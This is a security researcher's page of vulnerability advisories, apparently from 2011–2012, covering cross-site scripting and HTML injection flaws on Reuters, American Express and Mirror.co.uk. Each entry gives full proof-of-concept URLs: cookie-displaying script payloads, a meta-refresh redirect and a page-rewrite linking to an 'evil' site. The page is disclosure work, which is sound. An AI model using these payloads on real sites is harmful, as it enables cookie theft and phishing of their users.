IT Engineer, coder, dreamer.

My Advisories

Advisories

Here are the most important vulnerabilities that I've discovered and reported to vendors in the last years.

• Facebook "Post By Email" in Facebook Groups is vulnerable (07/01/2012)
• Google Sites was vulnerable to ClickJacking. Reported through Google Security Reward Program, acknowledged and rewarded with Google Security Hall of Fame.

XSS

• Reuters Finance HTML injection + XSS
• Reuters.com multiple XSS vulnerabilities
• AmericanExpress.com XSS vulnerability (SSL with Extended Validation bypass)
• Mirror.co.uk XSS vulnerability

Reuters Finance HTML injection + XSS

Date of discovery: 10 March 2011

Reuters Finance is vulnerable to a Cross-Site-Scripting (XSS) attack, and to a HTML code injection.

XSS Example:

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Opening this URL will execute arbitrary Javascript passed as sortBy, in this case it will simply display user's cookies. It is possible to redirect a user to any site using reuters.com as a "safe shield", i.e. in phishing attacks.

HTML Injection Example:

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=http://google.com%22%3E

This request redirects the user to google.com (any other evil site works too) using META tags, no JS required.

http://www.reuters.com/finance/markets/index?symbol=us!comp&sortBy=%22%3E%3Cscript%3Edocument.body.innerHTML=%27%3Chtml%3E%3Cb%3ETest!%3C/b%3E%3Cbr%3E%3Cbr%3E%3Ci%3EEvil%20content%20%3Ca%20href=http://evilsite.com%3Ehere%3C/a%3E!%3C/i%3E%3C/html%3E%27;%3C/script%3E

This URL rewrites the body HTML completely, using Javascript (due to XSS vulnerability).

Reuters has been notified. Status: WAITING FIXED.

Reuters.com multiple XSS vulnerabilities

Date of discovery: 10 August 2011

Reuters is vulnerable to Cross-Site-Scripting (XSS) attacks.

XSS Examples:

http://www.reuters.com/assets/commentsChild?articleId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://charts.reuters.com/reuters/enhancements/chartapi/chart_api.asp?symbol=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

Reuters has been notified. Status: WAITING .

AmericanExpress.com XSS vulnerability (SSL with Extended Validation bypass)

Date of discovery: 13 August 2011

American Express website is vulnerable to a Cross-Site-Scripting (XSS) attack.

Since a malicious attacker can execute arbitrary JS code, SSL EV is bypassed.

XSS Example:

https://passrewards.americanexpress.com/nr____.htm?&mnpos=%22%20onload=%22alert%28document.cookie%29%22

American Express has been notified. Status: WAITING FIXED.

Mirror.co.uk XSS vulnerability

Date of discovery: 18 August 2011

The Mirror is vulnerable to Cross-Site-Scripting (XSS) attacks.

XSS Example:

http://www.mirror.co.uk/weather/index.cfm?town=%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E

The Mirror has been notified. Status: WAITING .